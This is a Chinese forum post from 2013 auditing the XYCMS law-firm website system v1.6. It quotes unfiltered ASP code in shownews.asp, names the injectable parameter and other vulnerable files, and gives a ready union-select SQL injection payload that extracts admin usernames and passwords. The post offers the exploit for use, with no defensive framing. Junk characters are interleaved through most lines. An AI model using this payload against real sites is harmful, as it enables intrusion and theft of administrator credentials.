前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
" Z( T; T+ ^9 w/ ] % O+ ?, F* v, I0 P1 p( N- D- f
淫荡分割线4 G& X% X9 U1 O4 q! S
--------------------------------------------------------4 J, y) ~6 ]$ S5 m0 f8 y. D) J4 m
8 ?- r5 Y: |8 \" n( S: z# y7 I( c
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)# U+ G' |0 s; N) w6 g7 v& K4 m
源码地址:http://down.chinaz.com/soft/29233.htm; m! g4 e- V. L; y9 O3 k2 i
) E: g+ w3 V, P0 f G6 `0 Q漏洞文件:shownews.asp
8 Z# D y+ |0 L9 ]8 T. d& h- N. ? z漏洞代码:7-13行2 @' C$ m# P6 a8 @ J$ ~6 k
: c$ _& h% m5 E( N/ `) @, f, D
( c5 y6 f a0 J% f6 W<%
2 H* x6 D/ ~: j* h$ v* q. jid=request.QueryString("id")
# e8 i3 x& i" O' D4 u: y . _- K9 q- R8 J5 t$ D
set snews=server.createobject("adodb.recordset")
+ C* }0 N/ j1 _. t1 ]+ V8 |exec="select * from [news] where id="&id
7 f) m* f$ g8 [) z J E6 |snews.open exec,conn,1,1$ [) P/ J3 S5 N' r" w
%>$ P2 n$ B+ l4 a: ]; o, y
3 H6 S! A _) g9 }' t( g
9 L" _' w" C* g! \" g3 a- n什么过滤都没有 直造成注入
6 Y) k; c$ a# h% k/ s1 i + q0 y. G f; @2 W
注入点:http://127.0.0.1:99/shownews.asp?id=xx
4 h. p7 t/ N- J4 P6 A
! M M1 E+ V' A其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找& z5 Z7 Z+ _4 p' x' e
) v% h+ z# `2 S ]
7 J5 M. b4 m' n$ n7 `" Fexp: union select 1,admin,password,4,5,7 from admin_user
k, ]: K; ^4 u& \2 a/ s* ~+ v2 h+ s) L6 K9 y+ T2 {
|
发表于 2013-4-4 17:28:12
收藏
支持
反对